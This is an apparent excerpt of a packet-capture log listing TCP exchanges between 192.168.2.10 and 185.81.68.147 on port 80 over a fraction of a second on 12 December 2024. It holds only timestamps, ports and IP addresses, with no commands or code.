                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.675825119 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.676081896 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.677135944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.677146912 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.677192926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.677227974 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.677243948 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.678101063 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.678354025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.678437948 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.679162025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.679349899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.679438114 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.680336952 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.680614948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.680696964 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.681225061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.681243896 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.681351900 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.682207108 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.682320118 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.682400942 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.683229923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.683728933 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.683814049 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.684251070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.684350014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.684436083 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.685280085 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.685292006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.685389996 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.686261892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.686383963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.686474085 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.687289953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.687302113 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.687401056 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.688524008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.688566923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.688651085 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.689475060 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.689486027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.689590931 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.690330982 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.690609932 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.690695047 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.691339970 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.691912889 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.692001104 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.692380905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.692394018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.692501068 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.693335056 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.693427086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.693510056 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.694439888 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.694672108 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.694777012 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.695369005 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.695739985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.695823908 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.696448088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.697093010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.697200060 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.697468996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.697479963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.697519064 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.698451042 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.698662996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.698753119 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.699455023 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.699531078 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.699635029 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.700457096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.701514006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.701524973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.701546907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.701601982 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.701631069 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.702454090 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.702745914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.702920914 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.703641891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.703979969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.704070091 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.704556942 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.704566956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.704658985 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.705526114 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.705846071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.705929995 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.706558943 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.706572056 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.706671953 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.707617044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.707787037 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.707870960 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.708651066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.708766937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.708847046 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.709564924 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.709606886 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.709688902 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.710580111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.710936069 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.711021900 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.711637974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.711910009 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.711994886 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.712675095 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.712699890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.712800980 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.713671923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.713815928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.713907003 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.714693069 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.715310097 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.715399027 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.715708017 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.715728045 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.715811014 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.716728926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.716739893 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.716840029 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.717729092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.717739105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.717839956 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.718971968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.719228983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.719325066 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.719744921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.719855070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.719939947 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.720755100 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.775324106 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.860356092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.860399961 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.860527992 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.860739946 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.860948086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.861146927 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.861771107 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.861958981 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.862061024 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.862762928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.862937927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.863042116 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.863945007 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.863953114 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.864053965 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.864849091 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.865056038 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.865139008 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.865947008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.865953922 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.866063118 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.867268085 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.867275000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.867374897 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.867904902 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.868056059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.868154049 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.868845940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.869911909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.869919062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.869930983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.870021105 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.871004105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.871941090 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.871973991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.871979952 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.872035027 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.872059107 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.872937918 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.873982906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.873990059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.874015093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.874083996 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.874113083 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.874944925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.875741959 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.875838041 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.875977039 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.877048969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.877059937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.877130985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.877134085 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.877310991 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.878057003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.878063917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.878165960 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.879017115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.879946947 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.880083084 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.880089998 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.880098104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.880124092 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.881105900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.881544113 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.881674051 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.882081985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.882951975 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.883055925 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.883176088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.883183956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.883284092 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.884109974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.885128021 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.885134935 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.885160923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.885232925 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.885268927 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.886267900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.886377096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.886471033 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.887142897 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.888062000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.888164997 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.888202906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.888210058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.888308048 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.889184952 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.889569998 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.889662981 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.890239954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.890417099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.890523911 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.891239882 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.891247988 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.891344070 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.892190933 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.892355919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.892450094 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.893330097 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.894289970 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.894473076 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.894479036 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.894480944 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.894593000 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.895275116 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.895754099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.895879984 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.896287918 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.897380114 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.897387028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.897422075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.897475958 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.897500038 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.898330927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.898408890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.898510933 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.899373055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.899539948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.899631977 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.900342941 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.901124954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.901295900 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.901454926 CET8049946185.81.68.147192.168.2.10
